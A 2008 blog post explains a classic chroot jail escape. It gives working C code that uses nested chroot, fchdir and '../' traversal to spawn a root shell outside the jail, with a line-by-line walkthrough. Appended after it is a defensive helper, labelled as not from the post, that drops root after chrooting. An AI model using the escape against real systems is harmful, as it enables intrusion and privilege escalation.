fophillips dot org
July 14th, 2008
Get out of jail

I recently switched my server to NetBSD for a number of reasons. Mainly it was the challenge of having a new system, and the brief experience I had with NetBSD was positive (except that screen on x86_64 failed to detect my terminfo properly). Another deciding factor was the heightened security available on most BSD systems, NetBSD and OpenBSD in particular. An example of this is NetBSD’s ability to thwart a number of attack vectors for breaking out of chroot gaols, the most prominent of which still works on Linux.

A chroot is a system call that traps a process in an environment with a “fake” root directory, so that it can only access part of the filesystem. Chroots are often used when allowing untrusted users access to your system, which makes this method doubly scary.

All that is needed for this to work is the ability to run a process as root inside the chroot (being root inside a chroot is the most common scenario) and the ability to create a directory (a given if you are root in the chroot).

You can then use this little snippet of C code to break out of the gaol:

#include <stdlib.h>
#include <unistd.h>
#include <sys/types.h>
#include <sys/stat.h>
#include <fcntl.h>

int main() {
  int curdir = open(".",O_RDONLY);
  mkdir("the-way-out",1);
  chdir("the-way-out");
  chroot(".");
  fchdir(curdir);
  chdir("../../../../../../../../../..");
  chroot(".");
  system("/bin/sh");
  return 0;
}

You can then compile this with cc breakout.c -static -o breakout and move it into your chroot through scp or whatever means you want. Run it, and you will be granted a root shell on the machine, outside the chroot.

#include <stdlib.h>
#include <unistd.h>
#include <sys/types.h>
#include <sys/stat.h>
#include <fcntl.h>

This portion is just the necessary headers for the functions used. fcntl.h is for the file control calls (here, the O_RDONLY flag passed to open).

int main() {
  int curdir = open(".",O_RDONLY);
  mkdir("the-way-out",1);
  chdir("the-way-out");
  chroot(".");

This starts the main program function, saves a file descriptor for the current directory in curdir, creates a new directory and chroots to it. You will now be chrooted in /initial/directory/the-way-out. The curdir file descriptor is used later on.

  fchdir(curdir);
  chdir("../../../../../../../../../..");

This will chdir out of your second gaol and into your first one: the descriptor in curdir still refers to the original directory, which now lies outside the new root. It will then chdir you out of your initial chroot and put you (hopefully) in the real root directory. If you know where your gaol is on the real filesystem you can use the right number of ../ to get to /. The curdir file descriptor is needed because ../ won’t work from an intact gaol; it has to be (partly) broken first.

  system("/bin/sh");
  return 0;
}

This will launch the default shell /bin/sh and give you root access to the whole system. Congratulations. Now go tell your administrator to switch to NetBSD before someone with malicious intent comes along.
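The defensive counterpart, as an added example that is not from the original post: a small C helper that enters a chroot and then gives up root, since the escape above depends on being root inside the gaol. The enter_jail name, the chdir/chroot/chdir ordering, the refusal of uid 0 and the final setuid(0) self-check are this example's own assumptions, not anything the post describes.

```c
#define _DEFAULT_SOURCE 1   /* chroot() and setgroups() prototypes on glibc */
#include <errno.h>
#include <grp.h>
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <sys/types.h>

/* Hypothetical helper: enter a chroot and give up root in an order that
 * leaves the process no way back. Returns 0 on success, -1 on failure
 * with errno set; a caller should exit rather than carry on after -1. */
int enter_jail(const char *dir, uid_t uid, gid_t gid)
{
    /* The escape above needs root inside the gaol, so refuse to keep it. */
    if (uid == 0 || gid == 0) {
        errno = EINVAL;
        return -1;
    }
    /* chdir into the gaol first, chroot to "." and then chdir("/"), so the
     * working directory can never refer to anything outside the new root. */
    if (chdir(dir) != 0 || chroot(".") != 0 || chdir("/") != 0)
        return -1;
    /* Supplementary groups, then gid, then uid: uid goes last, or the
     * earlier calls would already be unprivileged and fail. */
    if (setgroups(0, NULL) != 0 || setgid(gid) != 0 || setuid(uid) != 0)
        return -1;
    /* Verify the drop really happened: getting root back must now fail. */
    if (setuid(0) == 0 || geteuid() == 0) {
        errno = EPERM;
        return -1;
    }
    return 0;
}

int main(int argc, char **argv)
{
    if (argc != 4) {
        fprintf(stderr, "usage: %s <jail-dir> <uid> <gid>\n", argv[0]);
        return 2;
    }
    if (enter_jail(argv[1], (uid_t)atoi(argv[2]), (gid_t)atoi(argv[3])) != 0) {
        perror("enter_jail");
        return 1;
    }
    printf("in %s as uid %d, root dropped\n", argv[1], (int)getuid());
    return 0;
}
```

Run as root with a non-zero uid and gid; with the privileges gone, the breakout's mkdir and chroot calls simply fail with EPERM.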

